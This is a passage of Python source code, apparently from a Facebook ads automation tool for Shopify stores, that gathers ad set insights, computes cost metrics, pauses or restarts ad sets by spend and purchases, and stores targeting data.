#new.frequency = frequency
new.impression = impression
new.impression_cost = impression_cost
new.impression_rate = impression_rate
new.post_click = post_click
new.post_click_cost = post_click_cost
new.post_click_rate = post_click_rate
new.click = click
new.click_cost = click_cost
new.click_rate = click_rate
new.add_to_cart = add_to_cart
new.add_to_cart_cost = add_to_cart_cost
new.add_to_cart_rate = add_to_cart_rate
new.website_purchase = website_purchase
new.website_purchase_cost = website_purchase_cost
new.website_purchase_rate = website_purchase_rate
new.spend = spend
new.website_purchase_value = website_purchase_value
new.return_on_investment = return_on_investment
#new.reach = reach
#new.reach_cost = reach_cost
#new.reach_rate = reach_rate
new.landing_page_view = landing_page_view
new.landing_page_view_cost = landing_page_view_cost
new.landing_page_view_rate = landing_page_view_rate
new.fb_pixel_view_content = fb_pixel_view_content
new.fb_pixel_view_content_cost = fb_pixel_view_content_cost
new.fb_pixel_view_content_rate = fb_pixel_view_content_rate
new.fb_pixel_initiate_checkout = fb_pixel_initiate_checkout
new.fb_pixel_initiate_checkout_cost = fb_pixel_initiate_checkout_cost
new.fb_pixel_initiate_checkout_rate = fb_pixel_initiate_checkout_rate
new.page_engagement = page_engagement
new.page_engagement_cost = page_engagement_cost
new.page_engagement_rate = page_engagement_rate
new.post_engagement = post_engagement
new.post_engagement_cost = post_engagement_cost
new.post_engagement_rate = post_engagement_rate
new.post_reaction = post_reaction
new.post_reaction_cost = post_reaction_cost
new.post_reaction_rate = post_reaction_rate
#new.save()
new.save()
def update_adsetinsight_data_find_which_adset_had_the_order(self, date_start = 0, date_end = 0, time_increment = 1, fields = ["adset_id", "action_values", "actions", "adset_name", "clicks", "date_start", "date_stop", "frequency", "impressions", "reach", "relevance_score", "spend"], is_a_shopify_order_match_check=False, is_a_shopify_order_match_check_orders=[]):
redprint("Running 'update_adsetinsight_data_find_which_adset_had_the_order' ... ")
for adset in Adset.objects.filter(is_created=True):
self.shop = Shop()( adset.shop_abbreviation)
data = [AttrDict(i.export_all_data()) for i in AdSet(adset.adset_id).get_insights(fields = fields, params={"time_increment": time_increment, "time_range": {"since": (Date()-date_start).datestr,"until": (Date()-date_end).datestr}})]
adset_shopify_order_matches = []
for i in data:
new = Adsetinsight()
existing = Adsetinsight.objects.filter(adset_id = adset.adset_id, date = Date().myDatetimenow(Date(i.date_start).dateobj))
if len(existing) == 1:
new = existing[0]
print("an existing")
actions = i.get("actions", {})
action_values = i.get("action_values", {})
actions_dict = AttrDict(dict(zip(key("action_type", actions), key("value", actions))))
action_values_dict = AttrDict(dict(zip(key("action_type", action_values), key("value", action_values))))
spend = round(float(i.spend), 4)
adset_id = adset.adset_id
date = Date().myDatetimenow(Date(i.date_start).dateobj)
frequency = round(float(i.frequency), 4)
impression = int(i.impressions)
if(0==impression):continue
impression_cost = round(float(tryreturn(lambda: spend / impression)), 4)
impression_rate = 0
post_click = int(i.clicks)
post_click_cost = round(float(tryreturn(lambda: spend / post_click)), 4)
post_click_rate = round(float(tryreturn(lambda: post_click / impression)), 4)
click = int(actions_dict.get("link_click", 0))
click_cost = round(float(tryreturn(lambda: spend / click)), 4)
click_rate = round(float(tryreturn(lambda: click / impression)), 4)
add_to_cart = int(actions_dict.get("offsite_conversion.fb_pixel_add_to_cart", 0))
add_to_cart_cost = round(float(tryreturn(lambda: spend / add_to_cart)), 4)
try:add_to_cart_rate = round(float(tryreturn(lambda: add_to_cart / impression)), 4)
except:add_to_cart_rate = 0 #(?)
website_purchase = int(actions_dict.get("offsite_conversion.fb_pixel_purchase", 0))
#conversion_pixel_purchase = int(actions_dict.get("offsite_conversion", 0))
#if website_purchase > 0 and conversion_pixel_purchase == 0:
# website_purchase = website_purchase
#if website_purchase > 0 and conversion_pixel_purchase > 0:
# website_purchase = ((website_purchase+conversion_pixel_purchase) / 2)
#if website_purchase == 0 and conversion_pixel_purchase > 0:
# website_purchase = conversion_pixel_purchase
website_purchase_cost = round(float(tryreturn(lambda: spend / website_purchase)), 4)
website_purchase_rate = round(float(tryreturn(lambda: website_purchase / impression)), 4)
spend = round(float(i.spend), 4)
website_purchase_value = round(float(action_values_dict.get("offsite_conversion.fb_pixel_purchase", 0)), 4)
return_on_investment = round(float(tryreturn(lambda: website_purchase_value / spend)), 4)
reach = int(i.reach)
reach_cost = round(float(tryreturn(lambda: spend / reach)), 4)
reach_rate = 0
landing_page_view = int(actions_dict.get("landing_page_view", 0))
landing_page_view_cost = round(float(tryreturn(lambda: spend / landing_page_view)), 4)
landing_page_view_rate = round(float(tryreturn(lambda: landing_page_view / impression)), 4)
fb_pixel_view_content = int(actions_dict.get("offsite_conversion.fb_pixel_view_content", 0))
fb_pixel_view_content_cost = round(float(tryreturn(lambda: spend / fb_pixel_view_content)), 4)
fb_pixel_view_content_rate = round(float(fb_pixel_view_content / impression), 4)
fb_pixel_initiate_checkout = int(actions_dict.get("offsite_conversion.fb_pixel_initiate_checkout", 0))
fb_pixel_initiate_checkout_cost = round(float(tryreturn(lambda: spend / fb_pixel_initiate_checkout)), 4)
fb_pixel_initiate_checkout_rate = round(float(fb_pixel_initiate_checkout / impression), 4)
page_engagement = int(actions_dict.get("page_engagement", 0))
page_engagement_cost = round(float(tryreturn(lambda: spend / page_engagement)), 4)
page_engagement_rate = round(float(page_engagement / impression), 4)
post_engagement = int(actions_dict.get("post_engagement", 0))
post_engagement_cost = round(float(tryreturn(lambda: spend / post_engagement)), 4)
post_engagement_rate = round(float(post_engagement / impression), 4)
post_reaction = int(actions_dict.get("post_reaction", 0))
post_reaction_cost = round(float(tryreturn(lambda: spend / post_reaction)), 4)
post_reaction_rate = round(float(post_reaction / impression), 4)
if is_a_shopify_order_match_check == True:
if len(existing) == 1:
if existing[0].website_purchase > website_purchase:
print("Found a new conversion for this Ad Set. Adding it to ")
adset_shopify_order_matches.append(existing[0])
print("\n")
redprint("adset-shopify-order-matches: %s | is_a_shopify_order_match_check_orders (count of shopify orders): %s" % (len(adset_shopify_order_matches), len(is_a_shopify_order_match_check_orders)) )
print("\n")
""" since this is so bad: the factors are [count_new_purchases, count_new_orders, count_new_adsets, matching_by_order_difference, and how badly this matters,-- of course you can assume 1 order at most per minute]"""
# run analysis here, -2 indents b/c the assumption is for i in data(of adset) iterates through 1 adset | keep it here, which will be fine for the next since you are saving the variables: order AND adset
if (is_a_shopify_order_match_check==True) and (len(adset_shopify_order_matches)==1) and (len(is_a_shopify_order_match_check_orders)==1) :
adset_shopify_order_match = adset_shopify_order_matches[0]
adset_shopify_order_match.order_ids.append(is_a_shopify_order_match_check_orders[0].id)
adset_shopify_order_match.save()
#elif (is_a_shopify_order_match_check==True) and (len(adset_shopify_order_matches)!=len(is_a_shopify_order_match_check_orders)) :
# """ This will occur if for example: is_a_shopify_order_match_check_orders > 1, say 2. if 2 is unequal to count of adset_shopify_order_matches,;;˚ then you got 2 sales in shopify confirmed, and less than 1/0 adsets had new orders. """
# """Assuming a 0-10 second Pixel-Update timeframe-- you will want to solve the case of if 0 adset_shopify_order_matches exist, which is simply assuming `should-have-posted` and assuming `nothing-new-purchasesed` """
# """ then is the case of a different sort of match: [where you have to choose which order_id of the 2 orders to update to the adset ] \route 1: exacting the closer order_created_time(seconds) to the adset_update_time \route 2: exacting the closer order amount/2 to the adset. \ """
# """ so route 1: can i find the purchase time to the minute or second ( i dont know)"""
# for adset in adset_shopify_order_matches:
# price_differences = []
# for shopify_order in is_a_shopify_order_match_check_orders:
# adset_value_increase = website_purchase_value - existing[0].website_purchase_value
# price_difference = adset_value_increase - total_price
# price_differences.append([shopify_order, price_difference])
# smallest_difference = min(price_differences)
# for price_difference in price_differences:
# if price_difference[1] == smallest_difference:
# print("price_difference of %s == smallest_difference: %s"% (price_difference[1], smallest_difference))
# shopify_order = price_difference[0]
# adset.order_ids = [] if adset.order_ids == None else adset.order_ids
# adset.order_ids.append(shopify.order_id)
# print("adset of id: %s which has previous conversion value of %s and now current conversion value of %s now is matched with order id: %s of total amount %s" % (existing[0].adset_id, existing[0].website_purchase_value, website_purchase_value, shopify_order.id, shopify_order.total_amount))
#elif (is_a_shopify_order_match_check==True) and (len(adset_shopify_order_matches)!=len(is_a_shopify_order_match_check_orders)) :
# # try to match by price as well. assuming 2 new orders, 2 new adsets with orders. if the case 2 new orders 1 new adset with orders, then due to the price match -- that 1 new adset will
# for adset in adset_shopify_order_matches:
# price_differences = []
# for shopify_order in is_a_shopify_order_match_check_orders:
# adset_value_increase = website_purchase_value - existing[0].website_purchase_value
# price_difference = adset_value_increase - total_price
# price_differences.append([shopify_order, price_difference])
# smallest_difference = min(price_differences)
# for price_difference in price_differences:
# if price_difference[1] == smallest_difference:
# print("price_difference of %s == smallest_difference: %s"% (price_difference[1], smallest_difference))
# shopify_order = price_difference[0]
# adset.order_ids = [] if adset.order_ids == None else adset.order_ids
# adset.order_ids.append(shopify.order_id)
# print("adset of id: %s which has previous conversion value of %s and now current conversion value of %s now is matched with order id: %s of total amount %s" % (existing[0].adset_id, existing[0].website_purchase_value, website_purchase_value, shopify_order.id, shopify_order.total_amount))
print("spend: %s"% spend)
print("adset_id: %s"% adset_id)
print("date: %s"% date)
print("frequency: %s"% frequency)
print("impression: %s"% impression)
print("impression_cost: %s"% impression_cost)
print("impression_rate: %s"% impression_rate)
print("post_click: %s"% post_click)
print("post_click_cost: %s"% post_click_cost)
print("post_click_rate: %s"% post_click_rate)
print("click: %s"% click)
print("click_cost: %s"% click_cost)
print("click_rate: %s"% click_rate)
print("add_to_cart: %s"% add_to_cart)
print("add_to_cart_cost: %s"% add_to_cart_cost)
print("add_to_cart_rate: %s"% add_to_cart_rate)
print("website_purchase: %s"% website_purchase)
print("website_purchase_cost: %s"% website_purchase_cost)
print("website_purchase_rate: %s"% website_purchase_rate)
print("spend: %s"% spend)
print("website_purchase_value: %s"% website_purchase_value)
print("return_on_investment: %s"% return_on_investment)
print("reach: %s"% reach)
print("reach_cost: %s"% reach_cost)
print("reach_rate: %s"% reach_rate)
print("landing_page_view: %s"% landing_page_view)
print("landing_page_view_cost: %s"% landing_page_view_cost)
print("landing_page_view_rate: %s"% landing_page_view_rate)
print("fb_pixel_view_content: %s"% fb_pixel_view_content)
print("fb_pixel_view_content_cost: %s"% fb_pixel_view_content_cost)
print("fb_pixel_view_content_rate: %s"% fb_pixel_view_content_rate)
print("fb_pixel_initiate_checkout: %s"% fb_pixel_initiate_checkout)
print("fb_pixel_initiate_checkout_cost: %s"% fb_pixel_initiate_checkout_cost)
print("fb_pixel_initiate_checkout_rate: %s"% fb_pixel_initiate_checkout_rate)
print("page_engagement: %s"% page_engagement)
print("page_engagement_cost: %s"% page_engagement_cost)
print("page_engagement_rate: %s"% page_engagement_rate)
print("post_engagement: %s"% post_engagement)
print("post_engagement_cost: %s"% post_engagement_cost)
print("post_engagement_rate: %s"% post_engagement_rate)
print("post_reaction: %s"% post_reaction)
print("post_reaction_cost: %s"% post_reaction_cost)
print("post_reaction_rate: %s"% post_reaction_rate)
new.spend = spend
new.ad_account_id = self.shop.Facebook_Business_Ad_Account_ID
new.adset_id = adset_id
new.date = date
new.frequency = frequency
new.impression = impression
new.impression_cost = impression_cost
new.impression_rate = impression_rate
new.post_click = post_click
new.post_click_cost = post_click_cost
new.post_click_rate = post_click_rate
new.click = click
new.click_cost = click_cost
new.click_rate = click_rate
new.add_to_cart = add_to_cart
new.add_to_cart_cost = add_to_cart_cost
new.add_to_cart_rate = add_to_cart_rate
new.website_purchase = website_purchase
new.website_purchase_cost = website_purchase_cost
new.website_purchase_rate = website_purchase_rate
new.spend = spend
new.website_purchase_value = website_purchase_value
new.return_on_investment = return_on_investment
new.reach = reach
new.reach_cost = reach_cost
new.reach_rate = reach_rate
new.landing_page_view = landing_page_view
new.landing_page_view_cost = landing_page_view_cost
new.landing_page_view_rate = landing_page_view_rate
new.fb_pixel_view_content = fb_pixel_view_content
new.fb_pixel_view_content_cost = fb_pixel_view_content_cost
new.fb_pixel_view_content_rate = fb_pixel_view_content_rate
new.fb_pixel_initiate_checkout = fb_pixel_initiate_checkout
new.fb_pixel_initiate_checkout_cost = fb_pixel_initiate_checkout_cost
new.fb_pixel_initiate_checkout_rate = fb_pixel_initiate_checkout_rate
new.page_engagement = page_engagement
new.page_engagement_cost = page_engagement_cost
new.page_engagement_rate = page_engagement_rate
new.post_engagement = post_engagement
new.post_engagement_cost = post_engagement_cost
new.post_engagement_rate = post_engagement_rate
new.post_reaction = post_reaction
new.post_reaction_cost = post_reaction_cost
new.post_reaction_rate = post_reaction_rate
#new.save()
new.save()
# 2. Stop AdSets based on today- data
def stop_adset_based_on_today_data(self, id):
todays_date = int(Date().myDatetimenow())
# check it out. i filtered adset insights to those which will have the id.
adsetinsights = Adsetinsight.objects.filter(date=todays_date, adset_id=id)
#cyanprint("[Count active today][%s]"%len(adsetinsights))
for adsetinsight in adsetinsights:
if Adset.objects.get(adset_id=adsetinsight.adset_id).status == "ACTIVE":
if (adsetinsight.spend >= 20 and adsetinsight.website_purchase == 0):# or (adsetinsight.impression_cost > .015 and adsetinsight.website_purchase == 0):
redprint("[stop_adsets_based_on_today_data][%s][%s][%s] [%s]['!=OK']"%(adsetinsight.adset_id,adsetinsight.spend,adsetinsight.impression_cost,adsetinsight.website_purchase))
July_Adset_Utilities().pause_adset(adset_id=adsetinsight.adset_id)
else:
greenprint("[%s][%s][%s] [%s]['OK']"%(adsetinsight.adset_id,adsetinsight.spend,adsetinsight.impression_cost,adsetinsight.website_purchase))
# 1. Stop AdSets based on summation data
def stop_adset_based_on_past_data(self, id):
# maybe i should print out in sentences? as when i read the data fields, i'm having to utter words in my head to transmit the data through my brain
todays_date = int(Date().myDatetimenow())
# check it out, i filtered adset insights to those containing this id as the adset_id
adsetinsights = Adsetinsight.objects.filter(date=todays_date, adset_id=id)
print("[Count active today][%s]"%len(adsetinsights))
""" this will be a unique iteration for adsetinsights with date(delivery) today AND with adset_id """
adset_ids_unique = list(sorted(list(set(key("adset_id", adsetinsights)))))
for adset_id in adset_ids_unique:
adsetinsights = Adsetinsight.objects.filter(adset_id = adset_id)
adsetinsights = keysort("date", adsetinsights)
spend = 0
website_purchase = 0
days = 0
cyanprint("[%s][activedays][%s]"%(adset_id,len(adsetinsights)))
for adsetinsight in adsetinsights:
spend += adsetinsight.spend
website_purchase += adsetinsight.website_purchase
days += 1
#input("? ? ? ? ? ? ? ? ?")
if Adset.objects.get(adset_id=adsetinsight.adset_id).status == "ACTIVE":
if (spend >= 20 and website_purchase == 0):
redprint("[stop_adsets_based_on_past_data][%s][%s][%s][%s]['!=OK']"%(adsetinsight.date, days, spend, website_purchase))
July_Adset_Utilities().pause_adset(adset_id=adsetinsight.adset_id)
else:
greenprint("[%s][%s][%s][%s]['OK']"%(adsetinsight.date, days, spend, website_purchase))
def restart_adset_based_on_today_data(self, id):
# Goal Is Restart If Sale
#todays_date = int(Date().myDatetimenow())
#adsetinsights = Adsetinsight.objects.filter(date=todays_date)
#cyanprint("[Count active today][%s]"%len(adsetinsights))
#for adsetinsight in adsetinsights:
# if Adset.objects.get(adset_id=adsetinsight.adset_id).status == "PAUSED":
# print(adsetinsight.id, adsetinsight.website_purchase)
# if (adsetinsight.website_purchase > 0):
# redprint("[restart_adsets_based_on_today_data][%s][%s][%s] [%s]['!=OK']"%(adsetinsight.adset_id,adsetinsight.spend,adsetinsight.impression_cost,adsetinsight.website_purchase))
# July_Adset_Utilities().restart_adset(adset_id=adsetinsight.adset_id)
# else:
# greenprint("[%s][%s][%s][%s] [%s]['OK']"%(adsetinsight.id,adsetinsight.adset_id,adsetinsight.spend,adsetinsight.impression_cost,adsetinsight.website_purchase))
todays_date = int(Date().myDatetimenow())
adsetinsight = tryreturn(Get, Adsetinsight, date=todays_date)
if(0==adsetinsight): print("No adsetinsight to restart adset on todays data with"); return
print(adsetinsight.id, adsetinsight.website_purchase)
if (adsetinsight.website_purchase > 0):
greenprint("[restart_adsets_based_on_today_data][%s][%s][%s] [%s]['!=OK']"%(adsetinsight.adset_id,adsetinsight.spend,adsetinsight.impression_cost,adsetinsight.website_purchase))
July_Adset_Utilities().restart_adset(adset_id=adsetinsight.adset_id)
else:
redprint("[%s][%s][%s][%s] [%s]['OK']"%(adsetinsight.id,adsetinsight.adset_id,adsetinsight.spend,adsetinsight.impression_cost,adsetinsight.website_purchase))
todays_date = int(Date().myDatetimenow())
print(adsetinsight.id, adsetinsight.website_purchase)
adsetinsight.save()
def update_ad_keyword_data(self, id):
time.sleep(2)
distinct_print("\nupdate_ad_keyword_data\n")
fields = ["actions", "clicks", "frequency", "impressions", "reach", "spend",]
#if (Adset.objects.get(adset_id=adset_id).date_last_requested_keyword_stats != None) and ( (int(Date().myDatetimenow()) - Adset.objects.get(adset_id=adset_id).date_last_requested_keyword_stats) < 7):
# # (default is 0 for date_last_requested_keyword_stats); continue if Previously requested keyword stats, and timerange since: < 7 days. <7 since. 200 is last day requested. on 208 it will send 201-207. 208-200 = 8. 8>7.
# continue
adset = Filter(Adset,adset_id=id)[0]
adset_id = id
if Adset.objects.get(adset_id=adset_id).date_last_requested_keyword_stats == None:
adset = Adset.objects.get(adset_id=adset_id); adset.date_last_requested_keyword_stats = 0; adset.save()
date_last_requested_keyword_stats_time_length = ((int(Date().myDatetimenow()-1) - Adset.objects.get(adset_id=adset_id).date_last_requested_keyword_stats))
distinct_print("date last requested keyword stats time length: %s" % date_last_requested_keyword_stats_time_length)
if (date_last_requested_keyword_stats_time_length >= 1) == False:
return None
Shop()(Adset.objects.get(adset_id=adset_id).shop_abbreviation)
adset = AdSet(adset_id)
ad = None
ads = adset.get_ads()
if len(ads) == 0:
return
ad = ads[0]
q=[]
data = []
dates = lmap(lambda i: (Date()-i)().strftime("%Y-%m-%d"), [8,7,6,5,4,3,2])
for i in dates:
keyword_stats = ad.get_keyword_stats(fields=fields,params={"date":i})
# print(keyword_stats)
if len(keyword_stats) > 0:
q.append(keyword_stats)
keyword_stat = keyword_stats[0].export_all_data()
for a in keyword_stat:
keyword_stat[a]["date"] = Date().myDatetimenow(Date(i)())
x = keyword_stat[a]
distinct_print(":Keyword Stat:\nImpressions:%s, Reach: %s, Spend: %s, Date: %s, Name: %s"%(x["impressions"], x["reach"], x["spend"], x["date"], a))
keyword_stat = AttrDict(keyword_stat)
data.append(keyword_stat)
#[2018.12.18 8:03:55 AM]Removed for ascii errordistinct_print("adset id, %s, len data, %s" % (adset_id, len(data)))
#[2018.12.18 8:03:55 AM]Removed for ascii errordistinct_print(data[-1])
print("\n\n")
#input("continue")
for keyword_stat in data:
for name,values in keyword_stat.items():
new = Interestinsight()
existing = Interestinsight.objects.filter(adset_id = adset_id, date = values.date, interest_name = name)
if len(existing) == 1:
new = existing[0]
#asciidistinct_print("[existing][adset_id][date][interest_name][%s][%s][%s]"%(adset_id,values.date,name))
""
elif len(existing) == 0:
#asciidistinct_print("[addition][adset_id][date][interest_name][%s][%s][%s]"%(adset_id,values.date,name))
""
new.adset_id = adset_id
new.date = values.date
new.interest_name = name
try:actions = AttrDict(keyword_stat[name]).actions
except: actions = {}
try:actions_dict = AttrDict(dict(zip(key("action_type", actions), key("value", actions))))
except:actions_dict = {}
interest_id = int(values.id)
interest_name = name
spend = getattr(new,"spend",0) + float(values.get("spend",0))
reach = getattr(new,"reach",0) + int(values.get("reach",0))
impression = getattr(new,"impression",0) + int(values.get("impressions",0))
click = getattr(new,"click",0) + int(actions_dict.get("link_click",0))
post_click = getattr(new,"post_click",0) + int(values.get("clicks", 0))
add_to_cart = getattr(new,"add_to_cart",0) + int(actions_dict.get("offsite_conversion.fb_pixel_add_to_cart",0))
website_purchase = getattr(new,"website_purchase",0) + int(actions_dict.get("offsite_conversion.fb_pixel_purchase", 0))
page_engagement = getattr(new,"page_engagement",0) + int(actions_dict.get("page_engagement",0))
photo_view = getattr(new,"photo_view",0) + int(actions_dict.get("photo_view",0))
post_engagement = getattr(new,"post_engagement",0) + int(actions_dict.get("post_engagement",0))
post_like = getattr(new,"post_like",0) + int(actions_dict.get("post_like",0))
new.interest_id = interest_id
new.interest_name = interest_name
new.spend = spend
new.reach = reach
new.impression = impression
new.click = click
new.post_click = post_click
new.add_to_cart = add_to_cart
new.website_purchase = website_purchase
new.page_engagement = page_engagement
new.photo_view = photo_view
new.post_engagement = post_engagement
new.post_like = post_like
new.save()
adset = Adset.objects.get(adset_id=adset_id)
adset.date_last_requested_keyword_stats = int(Date().myDatetimenow()-1)
#print("[%s][%s][%s]" % (adset_id, interest_name, adset.date_last_requested_keyword_stats))
adset.save()
#input("?: ")
def update_adset_targeting_data(self, id):
adset_id = id
adset = AdSet(adset_id)
Shop()(Adset.objects.get(adset_id=adset_id).shop_abbreviation)
data = AttrDict(adset.remote_read(fields=["daily_budget", "created_time","effective_status","targeting","attribution_spec","promoted_object","billing_event","optimization_goal","recommendations","bid_info","name","source_adset_id"]).export_all_data())
attribution_spec_dict = dict(zip(key("event_type", data.attribution_spec), key("window_days", data.attribution_spec)))
flexible_spec1 = None
flexible_spec2 = None
flexible_spec3 = None
flexible_spec4 = None
flexible_spec5 = None
created_time = datetime.strptime('-'.join(data.get("created_time").split("-")[:-1]), '%Y-%m-%dT%H:%M:%S')
click_attribution = attribution_spec_dict.get("CLICK_THROUGH", 0)
view_attribution = attribution_spec_dict.get("VIEW_THROUGH", 0)
custom_event_type = data.promoted_object.custom_event_type
billing_event = data.billing_event
optimization_goal = data.optimization_goal
recommendations = data.get("recommendations", "")
bid_info = data.get("bid_info", "")
device_platforms = list(sorted(data.targeting.get("device_platforms", [])))
publisher_platforms = list(sorted(data.targeting.get("publisher_platforms", [])))
facebook_positions = list(sorted(data.targeting.get("facebook_positions", [])))
print(data)
targeting_optimization = data.targeting.get("targeting_optimization","none")
user_device = list(sorted(data.targeting.get("user_device", [])))
user_os = list(sorted(data.targeting.get("user_os", [])))
age_min = data.targeting.age_min
age_max = data.targeting.age_max
genders = data.targeting.get("genders", [0])[0] # 2 is F, 1 is M, 0 is Both?
geo_locations = list(sorted(data.targeting.geo_locations.countries))
status = data.get("effective_status")
name = data.get("name")
daily_budget = float(data.get("daily_budget")) / 100
source_adset_id = data.get("source_adset_id", None)
custom_audiences = data.targeting.get("custom_audiences", None)
#body = Null
#try:
# try:
# v = AdSet(adset_id).get_ads()[0].get_ad_creatives()[0].remote_read(fields=["effective_object_story_id", "body"])
# body = v["body"]
# effective_object_story_id = v["effective_object_story_id"]
# body_url = re.findall(r"[a-zA-Z]*.com.*",body)
# distinct_print(body_url)
#
#
# except:
# """ an error here means an ad or creative was deleted and database needs to delete adset, """
# magentaprint("[adset_id][%s]"%adset_id)
# try:mysql_delete(Adset.objects.get(id=adset_id)) # continue # ( no effective object story id )
# except:pass
# if body == Null: 0/0
#except Exception as e:
# redprint(e)
# F L E X I B L E S P E C
flexible_specs_ordered_list = []
interest_dicts = {}
""" ::: Add Friendly Part In Here, you want to save the Facebookkeywordlist for all things 1 len ::: """
## testing
#return data
#return data.targeting.flexible_spec
## testing
if "flexible_spec" in data.targeting: # here add line say, only if flexible_spec in targeting
if(1==len(data.targeting.flexible_spec)):
x = data.targeting.flexible_spec[0]
October_Keyword_Utilities().receive_interest_dictlist(x.get("interests"), niche=getattr(Get(Adset,adset_id=adset_id),"niche",None))
""" ::: Add Friendly Part In Here, you want to save the Facebookkeywordlist for all things 1 len ::: """
try:
for idx,i in enumerate(data.targeting.flexible_spec):
interest_dictlist = i["interests"]
interest_dict = dict(zip(list(map(int, key("id", interest_dictlist))), list(map(str, key("name", interest_dictlist)))))
interest_dict_id_sum = sum(list(map(int, interest_dict.keys())))
interest_dicts[interest_dict_id_sum] = interest_dict
for idx, id_sum in enumerate(list(sorted(interest_dicts.keys()))):
flexible_specs_ordered_list.append(interest_dicts[id_sum])
for idx,flexible_spec in enumerate(flexible_specs_ordered_list):
sorted_interest_ids = list(sorted(flexible_spec.keys()))
ordered_interests = []
for interest_id in sorted_interest_ids:
interest_name = flexible_spec[interest_id]
ordered_interests.append([interest_id, interest_name])
flexible_specs_ordered_list[idx] = ordered_interests
if len(flexible_specs_ordered_list) > 0:
flexible_spec1 = flexible_specs_ordered_list[0]
if len(flexible_specs_ordered_list) > 1:
flexible_spec2 = flexible_specs_ordered_list[1]
if len(flexible_specs_ordered_list) > 2:
flexible_spec3 = flexible_specs_ordered_list[2]
if len(flexible_specs_ordered_list) > 3:
flexible_spec4 = flexible_specs_ordered_list[3]
if len(flexible_specs_ordered_list) > 4:
flexible_spec5 = flexible_specs_ordered_list[4]
except Exception as e:
redprint("[no interests][error: %s]"%e)
# F L E X I B L E S P E C
redprint("[%s][update_adset_targeting_data][created_time][%s]" % (adset["id"],created_time))
redprint("[%s][update_adset_targeting_data][attribution_spec_dict][%s]" % (adset["id"],attribution_spec_dict))
redprint("[%s][update_adset_targeting_data][click_attribution][%s]" % (adset["id"],click_attribution))
redprint("[%s][update_adset_targeting_data][view_attribution][%s]" % (adset["id"],view_attribution))
redprint("[%s][update_adset_targeting_data][custom_event_type][%s]" % (adset["id"],custom_event_type))
redprint("[%s][update_adset_targeting_data][billing_event][%s]" % (adset["id"],billing_event))
redprint("[%s][update_adset_targeting_data][optimization_goal][%s]" % (adset["id"],optimization_goal))
redprint("[%s][update_adset_targeting_data][recommendations][%s]" % (adset["id"],recommendations))
redprint("[%s][update_adset_targeting_data][bid_info][%s]" % (adset["id"],bid_info))
redprint("[%s][update_adset_targeting_data][device_platforms][%s]" % (adset["id"],device_platforms))
redprint("[%s][update_adset_targeting_data][publisher_platforms][%s]" % (adset["id"],publisher_platforms))
redprint("[%s][update_adset_targeting_data][facebook_positions][%s]" % (adset["id"],facebook_positions))
redprint("[%s][update_adset_targeting_data][targeting_optimization][%s]" % (adset["id"],targeting_optimization))
redprint("[%s][update_adset_targeting_data][user_device][%s]" % (adset["id"],user_device))
redprint("[%s][update_adset_targeting_data][user_os][%s]" % (adset["id"],user_os))
redprint("[%s][update_adset_targeting_data][age_min][%s]" % (adset["id"],age_min))
redprint("[%s][update_adset_targeting_data][age_max][%s]" % (adset["id"],age_max))
redprint("[%s][update_adset_targeting_data][genders][%s]" % (adset["id"],genders))
redprint("[%s][update_adset_targeting_data][geo_locations][%s]" % (adset["id"],geo_locations))
redprint("[%s][update_adset_targeting_data][name][%s]" % (adset["id"],name))
#redprint("[%s][update_adset_targeting_data][body][%s]" % (adset["id"],body))
#redprint("[%s][update_adset_targeting_data][effective_object_story_id][%s]" % (adset["id"],effective_object_story_id))
redprint("[%s][update_adset_targeting_data][daily_budget][%s]" % (adset["id"],daily_budget))
#@[2018.12.17 12:25 AM]for ascii redprint("[%s][update_adset_targeting_data][flexible_spec1][%s]" % (adset["id"],flexible_spec1))
#@[2018.12.17 12:25 AM]for ascii redprint("[%s][update_adset_targeting_data][flexible_spec2][%s]" % (adset["id"],flexible_spec2))
#@[2018.12.17 12:25 AM]for ascii redprint("[%s][update_adset_targeting_data][flexible_spec3][%s]" % (adset["id"],flexible_spec3))
#@[2018.12.17 12:25 AM]for ascii redprint("[%s][update_adset_targeting_data][flexible_spec4][%s]" % (adset["id"],flexible_spec4))
#@[2018.12.17 12:25 AM]for ascii redprint("[%s][update_adset_targeting_data][flexible_spec5][%s]" % (adset["id"],flexible_spec5))
adset = Adset.objects.get(adset_id=adset_id)
adset.created_time = created_time
adset.click_attribution = click_attribution
adset.view_attribution = view_attribution
adset.custom_event_type = custom_event_type
adset.billing_event = billing_event
adset.optimization_goal = optimization_goal
adset.recommendations = recommendations
adset.bid_info = dict(bid_info)
adset.device_platforms = device_platforms
adset.publisher_platforms = publisher_platforms
adset.facebook_positions = facebook_positions
adset.targeting_optimization = targeting_optimization
adset.user_device = user_device
adset.user_os = user_os
adset.age_min = age_min
adset.age_max = age_max
adset.genders = genders
adset.geo_locations = geo_locations
adset.status = status
adset.name = name
adset.daily_budget = daily_budget
#adset.body = body
#adset.effective_object_story_id = effective_object_story_id
adset.source_adset_id = source_adset_id
adset.custom_audiences = custom_audiences
adset.flexible_spec1 = flexible_spec1
adset.flexible_spec2 = flexible_spec2
adset.flexible_spec3 = flexible_spec3
adset.flexible_spec4 = flexible_spec4
adset.flexible_spec5 = flexible_spec5
adset.save()
def database_fields_to_data(self, adset_id):
adset = Adset.objects.get(adset_id=adset_id)
x = {}
x = AttrDict(x)
if adset.click_attribution:
x.attribution_spec = [] if "attribution_spec" not in x else x.attribution_spec
x.attribution_spec.append({'event_type': 'CLICK_THROUGH', 'window_days': adset.click_attribution})
if adset.view_attribution:
x.attribution_spec = [] if "attribution_spec" not in x else x.attribution_spec
x.attribution_spec.append({'event_type': 'VIEW_THROUGH', 'window_days': adset.view_attribution})
if adset.custom_event_type:
x.promoted_object = {} if "promoted_object" not in x else x.promoted_object
x.promoted_object.custom_event_type = adset.custom_event_type
x.promoted_object.pixel_id = Shop.objects.get(shop_abbreviation = adset.shop_abbreviation).Facebook_Pixel_ID
x.promoted_object.pixel_rule = '{"event":{"eq":"%s"}}' % adset.custom_event_type.title()
if adset.billing_event:
x.targeting = {} if "targeting" not in x else x.targeting
x.billing_event = adset.billing_event
if adset.optimization_goal:
x.optimization_goal = adset.optimization_goal
if adset.recommendations:
None
if adset.bid_info:
None
redprint("[No information set on what to do in event of a bid_info field as of 7/20/18]")
if adset.device_platforms:
x.targeting = {} if "targeting" not in x else x.targeting
x.targeting.device_platforms = adset.device_platforms
if adset.facebook_positions:
x.targeting = {} if "targeting" not in x else x.targeting
x.targeting.facebook_positions = adset.facebook_positions
if adset.publisher_platforms:
x.targeting = {} if "targeting" not in x else x.targeting
x.targeting.publisher_platforms = adset.publisher_platforms
if adset.targeting_optimization:
x.targeting = {} if "targeting" not in x else x.targeting
x.targeting.targeting_optimization = adset.targeting_optimization
if adset.user_device:
